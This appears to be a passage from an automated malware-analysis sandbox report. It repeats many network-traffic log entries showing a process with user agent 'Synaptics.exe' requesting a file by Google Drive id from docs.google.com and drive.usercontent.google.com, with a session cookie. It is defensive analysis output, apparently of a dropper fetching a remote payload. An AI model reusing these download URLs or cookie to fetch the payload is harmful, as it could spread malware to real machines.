                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
